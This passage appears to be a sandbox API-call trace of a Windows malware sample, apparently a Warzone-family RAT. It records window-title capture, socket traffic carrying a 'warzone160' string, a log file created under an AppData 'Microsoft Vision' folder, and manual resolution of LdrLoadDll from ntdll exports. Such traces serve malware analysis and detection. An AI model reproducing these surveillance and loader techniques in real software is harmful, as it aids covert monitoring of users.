HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42604e8 | out: hHeap=0x900000) returned 1 [0250.917] GetProcessHeap () returned 0x900000 [0250.917] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0250.917] GetProcessHeap () returned 0x900000 [0250.917] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260538 | out: hHeap=0x900000) returned 1 [0250.917] GetProcessHeap () returned 0x900000 [0250.917] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0250.917] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fcf0 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262778 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fcf0 | out: hHeap=0x900000) returned 1 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fcf0 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0271.866] GetProcessHeap () returned 0x900000 [0271.866] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fcf0 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934978 | out: hHeap=0x900000) returned 1 [0271.867] GetProcessHeap () returned 0x900000 [0271.867] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934978 [0271.867] GetLastInputInfo (in: plii=0x33f450 | out: plii=0x33f450) returned 1 [0271.867] GetTickCount () returned 0x11509d1 [0271.867] GetForegroundWindow () returned 0x10058 [0271.867] GetWindowTextW (in: hWnd=0x10058, lpString=0x33f238, nMaxCount=256 | out: lpString="Start") returned 5 [0271.867] lstrlenW (lpString="Start") returned 5 [0271.867] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0271.868] lstrlenW (lpString="Start") returned 5 [0271.868] lstrcpyW (in: lpString1=0x2cd0000, lpString2="Start" | out: lpString1="Start") returned="Start" [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934998 [0271.868] lstrlenW (lpString="Start") returned 5 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934998, Size=0x8) returned 0x9349a8 [0271.868] lstrlenW (lpString="Start") returned 5 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9349a8, Size=0x14) returned 0x9605d0 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x9349a8 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9349a8, Size=0x8) returned 0x934998 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934998, Size=0xc) returned 0x42627a8 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x42627a8, Size=0x20) returned 0x92f088 [0271.868] GetProcessHeap () returned 0x900000 [0271.868] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260538 [0271.868] GetProcessHeap () returned 0x900000 [0271.869] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9605d0 | out: hHeap=0x900000) returned 1 [0271.869] GetProcessHeap () returned 0x900000 [0271.869] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92f088 | out: hHeap=0x900000) returned 1 [0271.869] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0271.869] lstrlenA (lpString="warzone160") returned 10 [0271.869] lstrlenA (lpString="warzone160") returned 10 [0271.869] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0271.869] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0271.870] lstrlenA (lpString="warzone160") returned 10 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x42627a8 [0271.870] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x92f088 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x42604e8 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260560 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42604e8 | out: hHeap=0x900000) returned 1 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0271.870] GetProcessHeap () returned 0x900000 [0271.870] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92f088 | out: hHeap=0x900000) returned 1 [0271.870] send (s=0x228, buf=0x4260560*, len=32, flags=0) returned 32 [0271.871] GetProcessHeap () returned 0x900000 [0271.871] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260560 | out: hHeap=0x900000) returned 1 [0271.871] GetProcessHeap () returned 0x900000 [0271.871] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0271.871] GetProcessHeap () returned 0x900000 [0271.871] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260538 | out: hHeap=0x900000) returned 1 [0271.871] GetProcessHeap () returned 0x900000 [0271.871] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0271.871] recv (s=0x228, buf=0x33f4f0, len=12, flags=0) Thread: id = 189 os_tid = 0x7c8 Thread: id = 190 os_tid = 0x4f0 Thread: id = 191 os_tid = 0x4d4 Thread: id = 192 os_tid = 0x508 Thread: id = 193 os_tid = 0x4c0 Thread: id = 209 os_tid = 0x620 [0198.758] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0198.759] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x54c0f0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0198.760] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0198.760] GetLocalTime (in: lpSystemTime=0x326f9ec | out: lpSystemTime=0x326f9ec*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x1, wDay=0xc, wHour=0x17, wMinute=0x19, wSecond=0x16, wMilliseconds=0x2ea)) [0198.764] wsprintfW (in: param_1=0x326fa18, param_2="%02d-%02d-%02d_%02d.%02d.%02d" | out: param_1="12-10-2020_23.25.22") returned 19 [0198.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\", lpString2="12-10-2020_23.25.22" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" [0198.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned 80 [0198.765] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0198.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned 80 [0198.769] lstrcpyW (in: lpString1=0x2ce0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" [0198.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned 80 [0198.769] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0198.771] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" [0198.773] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\12-10-2020_23.25.22" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft vision\\12-10-2020_23.25.22"), dwDesiredAccess=0x10000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0198.787] CloseHandle (hObject=0x290) returned 1 [0198.801] GetProcessHeap () returned 0x900000 [0198.801] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x400000) returned 0x3c50020 [0198.806] CreateFileA (lpFileName="c:\\windows\\system32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0198.818] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcb600 [0198.818] ReadFile (in: hFile=0x290, lpBuffer=0x3c50020, nNumberOfBytesToRead=0xcb600, lpNumberOfBytesRead=0x326f9cc, lpOverlapped=0x0 | out: lpBuffer=0x3c50020*, lpNumberOfBytesRead=0x326f9cc*=0xcb600, lpOverlapped=0x0) returned 1 [0198.966] CloseHandle (hObject=0x290) returned 1 [0198.966] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x40) returned 0x4160000 [0198.984] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0198.984] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0198.985] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0198.986] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EtwpNotificationThread", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0198.987] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiFastSystemCall", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiIntSystemCall", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrHotPatchRoutine", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0198.988] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0198.989] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0198.989] lstrcmpA (lpString1="A_SHAFinal", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="A_SHAInit", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="A_SHAUpdate", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA 